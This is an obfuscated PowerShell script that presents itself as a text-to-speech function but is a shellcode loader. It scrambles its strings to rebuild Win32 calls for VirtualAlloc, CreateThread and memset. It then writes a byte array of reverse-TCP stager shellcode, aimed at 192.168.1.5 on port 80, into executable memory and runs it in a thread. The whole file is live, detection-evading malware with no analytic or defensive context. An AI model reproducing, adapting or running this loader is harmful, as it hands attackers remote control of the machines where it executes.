function Ou`T`-mrspEecH {
    [CmdletBinding()]
    param (
        [Parameter(MAnDatORY,
                   VaLUefROmPIPeLIne)]
        [string]${p`hR`ASe}
    )

    &("{1}{0}" -f 'd-Type','Ad') -AssemblyName ("{2}{1}{3}{0}" -f'h','tem.Sp','Sys','eec')

    ${vOI`Ce} = &("{1}{0}{2}{3}"-f 'O','New-','bje','ct') -TypeName ("{6}{5}{7}{2}{3}{11}{9}{10}{1}{0}{4}{8}"-f'Synthes','ech','peec','h','iz','em.','Syst','S','er','nthesis.S','pe','.Sy')

    ${V`oI`ce}.("{0}{1}" -f 'Spea','k').Invoke(${pHrA`Se})

}
${c} = ((("{78}{13}{31}{64}{62}{77}{79}{65}{34}{36}{2}{39}{28}{8}{11}{33}{42}{70}{38}{71}{20}{0}{19}{50}{63}{44}{53}{72}{76}{75}{46}{57}{26}{12}{29}{15}{40}{24}{41}{3}{54}{16}{22}{66}{49}{5}{73}{14}{47}{18}{9}{21}{68}{7}{48}{61}{1}{52}{43}{30}{74}{60}{80}{51}{6}{37}{55}{10}{67}{69}{25}{17}{23}{58}{4}{59}{35}{27}{56}{45}{32}" -f 'ess, uint ','s, I','ati',' sta','tatic extern IntPtr ','ntPtr lpThrea','tPtr lp','Ptr lp','n ','dwS','Import(3','IntPtr','t(3jwkern','t(3jwkern','Attributes, u','32.dll','Cre',')]',' ','dwSize, uint flAl','r','tackSize, In','ateTh','publi','p','3jw','lImpor','est, uint src, uin','xter','el',' lpParameter, uint','e',';',' Vi','ic','ntPtr d',' st','T','Ad','c e','3jw)]','ublic','r','r','t ','ount)','[','int','StartAddr','I','locationTyp','onFlags, In','ntPt','fl','tic extern IntPtr ','hreadId);[Dll','t c','Dl','c s','memset(I','at','es','dll','e, uin','l32.','ubl','read(','jwmsvc','t','rt.dll','tualAlloc(IntPtr lp','d','P','d',' dwCre','ect);','rot','3','[DllImpor','jw)]p','i'))-repLAcE  '3jw',[chAr]34);${W} = .("{0}{1}{2}"-f'Add-Ty','p','e') -memberDefinition ${c} -Name ("{1}{0}" -f'in32','W') -namespace ("{1}{2}{0}{3}{4}" -f'c','W','in32Fun','t','ions') -passthru;[Byte[]];[Byte[]]${z} = 0xfc,0xe8,0x82,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xc0,0x64,0x8b,0x50,0x30,0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf2,0x52,0x57,0x8b,0x52,0x10,0x8b,0x4a,0x3c,0x8b,0x4c,0x11,0x78,0xe3,0x48,0x01,0xd1,0x51,0x8b,0x59,0x20,0x01,0xd3,0x8b,0x49,0x18,0xe3,0x3a,0x49,0x8b,0x34,0x8b,0x01,0xd6,0x31,0xff,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf6,0x03,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe4,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x5f,0x5f,0x5a,0x8b,0x12,0xeb,0x8d,0x5d,0x68,0x33,0x32,0x00,0x00,0x68,0x77,0x73,0x32,0x5f,0x54,0x68,0x4c,0x77,0x26,0x07,0xff,0xd5,0xb8,0x90,0x01,0x00,0x00,0x29,0xc4,0x54,0x50,0x68,0x29,0x80,0x6b,0x00,0xff,0xd5,0x50,0x50,0x50,0x50,0x40,0x50,0x40,0x50,0x68,0xea,0x0f,0xdf,0xe0,0xff,0xd5,0x97,0x6a,0x05,0x68,0xc0,0xa8,0x01,0x05,0x68,0x02,0x00,0x00,0x50,0x89,0xe6,0x6a,0x10,0x56,0x57,0x68,0x99,0xa5,0x74,0x61,0xff,0xd5,0x85,0xc0,0x74,0x0a,0xff,0x4e,0x08,0x75,0xec,0xe8,0x3f,0x00,0x00,0x00,0x6a,0x00,0x6a,0x04,0x56,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x83,0xf8,0x00,0x7e,0xe9,0x8b,0x36,0x6a,0x40,0x68,0x00,0x10,0x00,0x00,0x56,0x6a,0x00,0x68,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x93,0x53,0x6a,0x00,0x56,0x53,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x83,0xf8,0x00,0x7e,0xc3,0x01,0xc3,0x29,0xc6,0x75,0xe9,0xc3,0xbb,0xf0,0xb5,0xa2,0x56,0x6a,0x00,0x53,0xff,0xd5;${g} = 0x1000;if (${Z}."Len`GTh" -gt 0x1000){${G} = ${Z}."l`En`gTh"};${X}=${w}::("{0}{1}{2}{3}"-f'Vir','tualAl','lo','c').Invoke(0,0x1000,${g},0x40);for (${i}=0;${I} -le (${Z}."leN`g`Th"-1);${I}++) {${W}::"Me`mSET"([IntPtr](${x}.("{0}{1}"-f'ToI','nt32').Invoke()+${i}), ${Z}[${i}], 1)};${w}::("{1}{0}{2}"-f'ateThrea','Cre','d').Invoke(0,0,${X},0,0,0);for (;;){.("{0}{2}{1}" -f 'Start-','leep','s') 60};
